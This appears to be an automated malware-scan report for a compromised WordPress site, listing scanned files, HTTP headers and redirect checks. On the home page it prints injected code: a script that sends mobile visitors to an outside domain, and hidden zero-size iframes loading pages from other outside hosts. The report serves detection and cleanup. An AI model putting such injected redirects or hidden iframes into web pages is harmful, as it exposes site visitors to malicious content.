Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omniroyalsolutions.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.omniroyalsolutions.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 06 Mar 2015 17:17:13 GMT Location: http://omniroyalsolutions.com/ Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://omniroyalsolutions.com/xmlrpc.php X-Powered-By: PHP/5.4.37 | clean |
http://omniroyalsolutions.com/ | 200 OK Content-Length: 43411 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://azzm.tk/?3"; }
Decoded script:
<iframe src="http://bimis.ml/?1" width="0" height="0" align="left"></iframe>
Antivirus reports:
Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php
This URL is marked by Google as suspicious
<iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0">
Hidden iFrame found. size: 0x0 src: http://bimis.ml/?1
<iframe src="http://bimis.ml/?1" width="0" height="0" align="left">
http://omniroyalsolutions.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/plugins/google-map-shortcode/js/gmshc.2.3.min.js?ver=3.8.5 | 200 OK Content-Length: 6347 Content-Type: application/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&language=en&ver=3.8.5 | 200 OK Content-Length: 4212 Content-Type: text/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.easing.1.3.js?ver%5B0%5D=jquery | 200 OK Content-Length: 8305 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery-ui.min.js?ver%5B0%5D=jquery | 200 OK Content-Length: 202335 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.quicksand.js?ver%5B0%5D=jquery | 200 OK Content-Length: 15003 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jsapi.js?ver%5B0%5D=jquery | 200 OK Content-Length: 24572 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/icemag.basic.slider.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 6556 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.default.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 23137 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/js/jquery.default.load.1.0.js?ver%5B0%5D=jquery | 200 OK Content-Length: 12239 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=3.5.0 | 200 OK Content-Length: 25327 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/themes/icemagtheme/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 8305 Content-Type: application/javascript | clean |
http://omniroyalsolutions.com/wp-content/plugins/prettyphoto-media/js/jquery.prettyPhoto.min.js?ver=3.1.4 | 200 OK Content-Length: 21027 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omniroyalsolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 17:17:16 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_fcgid/2.3.10-dev
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://omniroyalsolutions.com/xmlrpc.php
X-Powered-By: PHP/5.4.37
Second query (visit from search engine):
GET / HTTP/1.1
Host: omniroyalsolutions.com
Referer: http://www.google.com/search?q=omniroyalsolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.